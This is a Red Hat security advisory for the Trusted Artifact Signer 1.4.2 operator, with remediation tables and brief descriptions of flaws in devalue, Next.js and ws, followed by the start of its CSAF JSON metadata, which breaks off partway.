| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
A flaw was found in devalue, a JavaScript library used for serializing values. Due to quirks in some JavaScript engines, the `devalue.parse` function could be exploited by a remote attacker when deserializing specially crafted sparse arrays. This could lead to excessive memory consumption, resulting in a Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
A flaw was found in Next.js. Applications utilizing the Pages Router with internationalization (i18n) configured and middleware or proxy-based authorization are susceptible to unauthorized access. A remote attacker can exploit this by making locale-less /_next/data/<buildId>/<page>.json requests, which bypass the intended authorization checks. This allows the attacker to retrieve sensitive server-side rendered (SSR) JSON data from protected pages, leading to information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in Next.js. This vulnerability allows an attacker to bypass security checks in web applications that use Next.js middleware to protect specific web pages. By sending specially crafted web addresses, an attacker can access protected content without proper authorization. This could lead to unauthorized viewing of sensitive information or access to restricted features.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in Next.js. App Router applications that use middleware or proxy-based authorization checks are vulnerable to unauthorized access. A remote attacker can exploit this by crafting specific .rsc and segment-prefetch URLs, which bypass the intended middleware rules. This allows access to protected content without proper authorization.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in Next.js. When self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. A remote attacker could exploit this by requesting large local assets from the /_next/image endpoint. This can lead to out-of-memory conditions, resulting in a Denial of Service (DoS) for the application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in Next.js. Self-hosted applications utilizing the built-in Node.js server are vulnerable to Server-Side Request Forgery (SSRF) through specially crafted WebSocket upgrade requests. A remote attacker can exploit this by causing the server to proxy requests to arbitrary internal or external destinations. This could lead to the exposure of internal services or sensitive cloud metadata endpoints.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in Next.js. Applications utilizing Partial Prerendering via the Cache Components feature are susceptible to connection exhaustion. A remote attacker can send crafted POST requests to a server action, triggering a request-body handling deadlock. This leaves connections open, consuming server resources and ultimately leading to a Denial of Service (DoS) for legitimate users.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in Next.js. A remote unauthenticated attacker could exploit a bypass in a security fix when using middleware.ts with Turbopack. This vulnerability could lead to the disclosure of sensitive information.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
A flaw was found in ws, an open source WebSocket client and server for Node.js. The `websocket.close()` implementation is vulnerable to uninitialized memory disclosure when a `TypedArray` is passed as the reason argument. This can lead to the disclosure of sensitive information from uninitialized memory.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — | ||
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
A flaw was found in ws, an open source WebSocket client and server. A remote attacker can exploit this memory exhaustion vulnerability by sending a high volume of exceptionally small fragments and data chunks. This action forces the affected component to allocate and hold structural wrappers that consume excessive memory. Consequently, this leads to process termination and a denial of service (DoS) for the remote peer.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-search-ui-rhel9@sha256:c0dfe2abf8d55740eefbaa647de617d1f796390111fae05919bf77897763977b_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/certificate-transparency-rhel9@sha256:428e9da9c20b26a5ba88ec84f1be212ce0474f81c2fd56ac062e3948eb23070d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/fulcio-rhel9@sha256:9ba4d183d46315edb1a059e55267f30ab66069324cfc3a1a205fdabe45641e71_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-backfill-redis-rhel9@sha256:c34be5197926b29fc858ca4295773feb24d7a812691d4c88a70f3be3bbe49ff9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/rekor-server-rhel9@sha256:938ca7e6d7fa3862825a86f142be9c6a7b5da1f7dfc6393bff5f77e24613bf67_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/timestamp-authority-rhel9@sha256:5c3552503bc698f229f835e3686462b75a3af15575edfa1081880fc945f2d8cf_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-database-rhel9@sha256:b5736b9f843573e1820b25da162b537b5f324d437c78a79c54f5258fa2204521_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logserver-rhel9@sha256:6cac09fcce3938f4e08e0dc5960ca5159bd4c36d238e1e49037c977c62dde85d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-logsigner-rhel9@sha256:613398e5394371bac97d05c04d97b163c5048a8095ff8ff8bc510a24e46092d6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Trusted Artifact Signer 1.4:registry.redhat.io/rhtas/trillian-redis-rhel9@sha256:fd4c05777a37475158316b694d4319c0a8ea0e39838306ee73523ec37fd3f3fa_amd64 | — |
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The 1.4.2 release of Red Hat Trusted Artifact Signer OpenShift Operator.\nFor more details please visit the product documentation at https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4",
"title": "Topic"
},
{
"category": "general",
"text": "The RHTAS Operator can be used with OpenShift Container Platform 4.17, 4.18, 4.19, 4.20, 4.21, 4.22",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:37272",
"url": "https://access.redhat.com/errata/RHSA-2026:37272"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4",
"url": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_trusted_artifact_signer/1.4/html-single/release_notes/index"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-71319",
"url": "https://access.redhat.com/security/cve/CVE-2025-71319"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-39828",
"url": "https://access.redhat.com/security/cve/CVE-2026-39828"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-39829",
"url": "https://access.redhat.com/security/cve/CVE-2026-39829"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-39830",
